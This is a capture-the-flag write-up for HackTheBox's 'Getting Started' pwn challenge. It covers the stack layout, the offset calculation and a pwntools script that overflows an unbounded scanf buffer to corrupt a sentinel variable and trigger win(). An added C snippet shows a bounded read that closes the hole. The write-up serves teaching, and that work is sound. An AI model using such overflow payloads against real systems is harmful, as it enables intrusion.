Tags: pwn, free, easy

Task: Tutorial challenge with 64-bit ELF binary using scanf without length check. Solution: Buffer overflow to overwrite adjacent stack variable and trigger win condition.

Techniques: buffer_overflow, stack_layout_analysis, variable_corruption

Getting Started — HackTheBox

Description

Tutorial challenge for learning buffer overflow basics. Binary file gs — 64-bit ELF with PIE and NX enabled, but no stack canary.

Target: 94.237.63.176:35784

Binary Security

Arch:       amd64-64-little
RELRO:      Full RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        PIE enabled

Analysis

Stack Layout (from main function)

rbp-0x30 (offset -48): Buffer[32 bytes]     <- user input
rbp-0x10 (offset -16): Alignment[8 bytes]   <- initialized to 0x6969696969696969
rbp-0x08 (offset -8):  Target[8 bytes]      <- initialized to 0xdeadbeef
rbp:                   Saved RBP
rbp+0x08:              Return address

Vulnerability

The program uses scanf("%s") to read user input into a buffer without length checking — classic buffer overflow.

Win Condition

17c5: movl  $0xdeadbeef, %eax
17ca: cmpq  %rax, -0x8(%rbp)      ; compare target with 0xdeadbeef
17ce: jne   0x17dc                ; if NOT equal — jump to win
17dc: callq 0x11f5 <win>          ; win() reads and prints flag.txt

If the target value is changed from 0xdeadbeef to anything else — the win() function is called.

Exploitation

Offset Calculation

  • Buffer starts at rbp-48
  • Target is at rbp-8
  • Distance = 48 - 8 = 40 bytes

Payload

Send 40 bytes to fill buffer (32) + alignment (8), then any additional bytes overwrite target.

[AAAA...AAAA][BBBBBBBB][CCCCCCCC]
 Buffer(32)   Align(8)  Target(8) <- overwritten!
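As an added example (not part of the writeup and not the challenge's source), the frame from the Stack Layout section modelled in C with the width-limited scanf that would have closed the hole, plus a helper that measures how far an unbounded "%s" read would spill for a given input; the struct and function names are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of the challenge's main() frame (an assumption for illustration,
 * not the binary's source): a 32-byte buffer followed by two 8-byte locals,
 * the second holding the 0xdeadbeef sentinel that gates win(). */
struct frame {
    char     buffer[32];   /* rbp-0x30 */
    uint64_t alignment;    /* rbp-0x10, 0x6969696969696969 */
    uint64_t target;       /* rbp-0x08, compared against 0xdeadbeef */
};

/* Constructed input mirroring the writeup's 40 + 8 byte payload. */
static const char kPayload[] =
    "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "BBBBBBBB";

/* Hardened reader: "%31s" (sizeof buffer - 1) instead of the challenge's
 * bare "%s", so at most 31 characters plus a NUL are stored and no write
 * can reach `alignment` or `target`.  Returns the number of characters
 * stored, or -1 if nothing was read or the sentinel was corrupted. */
int read_bounded(const char *input)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    f.alignment = 0x6969696969696969ULL;
    f.target    = 0xdeadbeefULL;
    if (sscanf(input, "%31s", f.buffer) != 1)
        return -1;
    if (f.target != 0xdeadbeefULL)
        return -1;
    return (int)strlen(f.buffer);
}

/* Review-time check for any unbounded "%s" read: how many bytes (including
 * the terminating NUL) the read would store for a given input token, versus
 * the destination size.  Returns the number of bytes that would land past
 * the end of the buffer; 0 means the input fits. */
size_t overflow_bytes(const char *input, size_t buffer_size)
{
    size_t needed = strcspn(input, " \t\n") + 1;  /* %s stops at whitespace */
    return needed > buffer_size ? needed - buffer_size : 0;
}

int main(void)
{
    printf("bounded read stored %d chars, sentinel intact\n", read_bounded(kPayload));
    printf("unbounded %%s would spill %zu bytes past a 32-byte buffer\n",
           overflow_bytes(kPayload, 32));
    return 0;
}
```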

Solution

#!/usr/bin/env python3
from pwn import *

IP = '94.237.63.176'
PORT = 35784

r = remote(IP, PORT)

# 40 bytes to target, then overwrite it
payload = b'A' * 40 + b'BBBBBBBB'

r.recvuntil(b'>')          # wait for the input prompt
r.sendline(payload)

r.recvuntil(b'HTB{', timeout=5)
flag = b'HTB{' + r.recvuntil(b'}')
success(f'Flag: {flag.decode()}')
r.close()

Key Indicators

Use this technique when:

  • scanf("%s") or gets() without length checking
  • Important variables are adjacent to the buffer on the stack
  • Variable comparison with a "magic" value
  • No stack canary (checksec shows "No canary found")
  • No RIP control required — changing a variable value is sufficient

Lessons

  1. Stack layout — variables on the stack are laid out sequentially, so a buffer overflow corrupts the variables adjacent to the buffer
  2. Simplest BOF — no control flow hijacking needed, just changing a value is enough
  3. Checksec — always check binary protections before exploitation

Challenge Files

  • gs — 64-bit ELF binary
  • wrapper.py — exploit template
  • flag.txt — local test flag
  • glibc/ — provided libc files
